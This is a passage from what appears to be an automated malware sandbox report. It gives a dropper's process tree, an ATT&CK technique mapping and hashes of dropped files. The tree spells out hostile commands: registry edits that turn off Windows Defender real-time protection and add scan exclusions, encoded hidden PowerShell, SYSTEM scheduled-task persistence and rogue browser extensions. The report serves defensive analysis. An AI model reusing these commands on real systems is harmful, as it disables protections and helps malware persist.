    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:1580

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:2788

C:\Windows\windefender.exe
C:\Windows\windefender.exe
1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:2880

C:\Windows\system32\taskeng.exe
taskeng.exe {2C5DA0EC-3CCA-4445-B513-7DD67B8BD337} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:1780
- C:\Users\Admin\AppData\Local\Temp\vYzpyBFfHhXPDWiMt\NQONvMOpkwRLZMC\BpHuwsu.exe
  C:\Users\Admin\AppData\Local\Temp\vYzpyBFfHhXPDWiMt\NQONvMOpkwRLZMC\BpHuwsu.exe cj /vhsite_idCqD 385118 /S
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  PID:2788
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "goJkSpvHG" /SC once /ST 02:54:46 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - Creates scheduled task(s)
    PID:1660
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "goJkSpvHG"
    3⤵
    PID:2652
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "goJkSpvHG"
    3⤵
    PID:1152
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
    3⤵
    PID:2288
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
      4⤵
      Modifies Windows Defender Real-time Protection settings
      PID:1104
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
    3⤵
    PID:1380
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
      4⤵
      Modifies Windows Defender Real-time Protection settings
      PID:2096
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gfhIwBvFY" /SC once /ST 02:38:21 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - Creates scheduled task(s)
    PID:2340
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "gfhIwBvFY"
    3⤵
    PID:660
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "gfhIwBvFY"
    3⤵
    PID:2500
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RZfGRCgJsrDIEOco" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1156
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RZfGRCgJsrDIEOco" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:596
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RZfGRCgJsrDIEOco" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2648
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RZfGRCgJsrDIEOco" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:2312
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RZfGRCgJsrDIEOco" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2400
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RZfGRCgJsrDIEOco" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1816
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RZfGRCgJsrDIEOco" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1472
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RZfGRCgJsrDIEOco" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1100
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C copy nul "C:\Windows\Temp\RZfGRCgJsrDIEOco\xULEJtJB\CZLtZoybWxojFeeW.wsf"
    3⤵
    PID:240
- - C:\Windows\SysWOW64\wscript.exe
    wscript "C:\Windows\Temp\RZfGRCgJsrDIEOco\xULEJtJB\CZLtZoybWxojFeeW.wsf"
    3⤵
    - Modifies data under HKEY_USERS
    PID:932
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FohpjzYDshfCC" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:1268
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FohpjzYDshfCC" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:1576
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IoHaAJhEDYhU2" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:1176
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IoHaAJhEDYhU2" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:2856
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KCGdmeQdU" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:2592
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KCGdmeQdU" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:1748
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bYkzgWxJAWlLeHAUHjR" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:1300
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bYkzgWxJAWlLeHAUHjR" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:2640
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hgFvgKbJayUn" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:2884
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hgFvgKbJayUn" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:2816
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\uqeRQcQeSVSWnHVB" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:908
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:2196
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\uqeRQcQeSVSWnHVB" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:2572
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:828
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\vYzpyBFfHhXPDWiMt" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:2720
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\vYzpyBFfHhXPDWiMt" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:2156
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RZfGRCgJsrDIEOco" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:3056
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RZfGRCgJsrDIEOco" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:1164
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FohpjzYDshfCC" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1152
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FohpjzYDshfCC" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1232
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IoHaAJhEDYhU2" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:2224
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IoHaAJhEDYhU2" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:2740
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KCGdmeQdU" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:524
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KCGdmeQdU" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1804
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bYkzgWxJAWlLeHAUHjR" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:2172
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bYkzgWxJAWlLeHAUHjR" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:2252
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hgFvgKbJayUn" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:2716
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hgFvgKbJayUn" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:2368
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\uqeRQcQeSVSWnHVB" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:2428
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\uqeRQcQeSVSWnHVB" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:2836
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:2704
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:2324
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\vYzpyBFfHhXPDWiMt" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1684
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\vYzpyBFfHhXPDWiMt" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1604
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RZfGRCgJsrDIEOco" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1768
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RZfGRCgJsrDIEOco" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1636
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gjmLZugQI" /SC once /ST 01:12:22 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - Creates scheduled task(s)
    PID:1400
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "gjmLZugQI"
    3⤵
    PID:1100
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "gjmLZugQI"
    3⤵
    PID:1756
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
    3⤵
    PID:952
  - - C:\Windows\SysWOW64\reg.exe
      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
      4⤵
      PID:1932
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
    3⤵
    PID:2672
  - - C:\Windows\SysWOW64\reg.exe
      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
      4⤵
      PID:1304
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "YsLxjqvMZrWymyIEG" /SC once /ST 01:03:58 /RU "SYSTEM" /TR "\"C:\Windows\Temp\RZfGRCgJsrDIEOco\aRhQLhcCIAxmkyn\fzzBiVW.exe\" s7 /CDsite_idVZa 385118 /S" /V1 /F
    3⤵
    - Drops file in Windows directory
    - Creates scheduled task(s)
    PID:3012
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "YsLxjqvMZrWymyIEG"
    3⤵
    PID:2196
- C:\Windows\Temp\RZfGRCgJsrDIEOco\aRhQLhcCIAxmkyn\fzzBiVW.exe
  C:\Windows\Temp\RZfGRCgJsrDIEOco\aRhQLhcCIAxmkyn\fzzBiVW.exe s7 /CDsite_idVZa 385118 /S
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Drops Chrome extension
  - Drops file in System32 directory
  - Drops file in Program Files directory
  - Modifies data under HKEY_USERS
  PID:2520
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "bwKBwqZYjkqxftWshF"
    3⤵
    PID:2720
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
    3⤵
    PID:1488
  - - C:\Windows\SysWOW64\reg.exe
      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
      4⤵
      PID:2568
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
    3⤵
    PID:1056
  - - C:\Windows\SysWOW64\reg.exe
      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
      4⤵
      PID:1348
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\KCGdmeQdU\NAyhcp.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "SMPpzaSdDqsJvHF" /V1 /F
    3⤵
    - Drops file in Windows directory
    - Creates scheduled task(s)
    PID:2304
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "SMPpzaSdDqsJvHF2" /F /xml "C:\Program Files (x86)\KCGdmeQdU\RuJChnV.xml" /RU "SYSTEM"
    3⤵
    - Creates scheduled task(s)
    PID:1304
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /END /TN "SMPpzaSdDqsJvHF"
    3⤵
    PID:964
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "SMPpzaSdDqsJvHF"
    3⤵
    PID:3012
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "znrIDUvoucqewg" /F /xml "C:\Program Files (x86)\IoHaAJhEDYhU2\chRgjEW.xml" /RU "SYSTEM"
    3⤵
    - Creates scheduled task(s)
    PID:2628
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "KVEvoYrDZKLqM2" /F /xml "C:\ProgramData\uqeRQcQeSVSWnHVB\FeAcmzd.xml" /RU "SYSTEM"
    3⤵
    - Creates scheduled task(s)
    PID:2436
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "RHUfDusjVndeEILcZ2" /F /xml "C:\Program Files (x86)\bYkzgWxJAWlLeHAUHjR\GUGzfef.xml" /RU "SYSTEM"
    3⤵
    - Creates scheduled task(s)
    PID:1488
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "BxzpJXegsLHBOSWsuyU2" /F /xml "C:\Program Files (x86)\FohpjzYDshfCC\kBxRsUP.xml" /RU "SYSTEM"
    3⤵
    - Creates scheduled task(s)
    PID:1056
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "EtrQGzrpWMpnyWxNE" /SC once /ST 01:00:39 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\RZfGRCgJsrDIEOco\rGesrLXQ\Czxocpv.dll\",#1 /qbsite_idSGX 385118" /V1 /F
    3⤵
    - Drops file in Windows directory
    - Creates scheduled task(s)
    PID:2304
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "EtrQGzrpWMpnyWxNE"
    3⤵
    PID:3004
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
    3⤵
    PID:2500
  - - C:\Windows\SysWOW64\reg.exe
      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
      4⤵
      PID:596
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
    3⤵
    PID:2112
  - - C:\Windows\SysWOW64\reg.exe
      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
      4⤵
      PID:932
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "YsLxjqvMZrWymyIEG"
    3⤵
    PID:2424
- C:\Windows\system32\rundll32.EXE
  C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\RZfGRCgJsrDIEOco\rGesrLXQ\Czxocpv.dll",#1 /qbsite_idSGX 385118
  2⤵
  PID:1700
- - C:\Windows\SysWOW64\rundll32.exe
    C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\RZfGRCgJsrDIEOco\rGesrLXQ\Czxocpv.dll",#1 /qbsite_idSGX 385118
    3⤵
    - Blocklisted process makes network request
    - Checks BIOS information in registry
    - Loads dropped DLL
    - Drops file in System32 directory
    - Enumerates system info in registry
    - Modifies data under HKEY_USERS
    PID:2776
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /DELETE /F /TN "EtrQGzrpWMpnyWxNE"
      4⤵
      PID:1188

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:952

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:2728

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:2344

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

Software Discovery

T1518

Security Software Discovery

T1518.001

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

Filesize
1.4MB

MD5
5b964b95b13409ce17d0412dc6d07611

SHA1
bf074701a8afb7a1efdd0e750855541cea2b00a4

SHA256
f6bbd84bd7f31bd2be3436f46b69f42167900f6f3a73e96eff0347a9a3ff4fd8

SHA512
42e5f469b13bbbd624d7a026eee9f0e2631340ddae8708fa48f1928676c210444d0d82e00fd8c9b8d46fe6a50969100e631d9b1a61e1190b934bf9a17f4832ee

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
14579272248d5016b25973510557a4ab

SHA1
2ea27452b6c66c262dcd9d085da48c190ad07afc

SHA256
c83d85c2778d71abe3daab01479939f280b4c7867f93f6be29da0118c1ff1e15

SHA512
637ad4334f1803b7dec458b20d68515bf901ec9ec94c9838e14f7f439d4adce7c0d3ebbbfae3c509aaacafb5e0afafa43b415fb867904741cdb85d449726caed

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
3339ca7b0c7491b866150e9f4402915f

SHA1
28dc526b90a1b2404fb3a4d320854f610860b5f8

SHA256
c173aef7787798478be93a147d7b244965b5c0c400f2e722b00608932d3d6cc4

SHA512
c742516ebdafa19111ccd7ecf4cca97479df9f38dc9c9f6c8175344e9a297973886b3b92ce4f00ec24e381dd2312343d1f86843c848eab5ef25dd495ee35b5d1

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
a12192824d14e4b7babf50d02e7850e6

SHA1
19fbce68e250b9ab418c95e2921aee6e0d8f5201

SHA256
b4368a417e1277647ffa8500b075707f7ef27875ca3e1c531b2916fd0e3f70b1

SHA512
c58369943fc41f892649fb2fab5a8b252512252644934da0c269ba70e84331d8fa8f3ec6243e61776b76f62c5df4b945ce8ab7ebb1af953cec3bc304b8c3d685

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
7f4c33fc8259768b6bd367335cadd35d

SHA1
adade2da246f09d96c77e2cd1fbe69ce2fbb9c2f

SHA256
3b78e6899292f759b44628e8f63cc4cd454f83e9b561de5a5f784c05def54c44

SHA512
81e4de37c33860469cfa7a92118578d08429642e858ae9bf34c9017921f9ef638e56a9a3fd5b4ae3695584d3f10fc1f898314fcfbc1c9a0aecafbfe347b05765

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
d7413361b65928eba95c67a4ee1c6fba

SHA1
26603046fcc5506beaae94eef06f71deb6c28076

SHA256
86cb7abcbddff7a76013a417a818e6bd42a570a550d379b35b923dec16cf0663

SHA512
3240558ef13d4e499c9faa4e3f15de380d605110484a6eba68459aa69d8a7f22a25893ffea3f263f560b285859b75fb1b9cff1b19b4726dc22e9c9a7de0e152b

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
8f389eab4f78ddc02db134e02832239d

SHA1
49bad890ff6b3ea7efe4d6cc52e65da1159e6516

SHA256
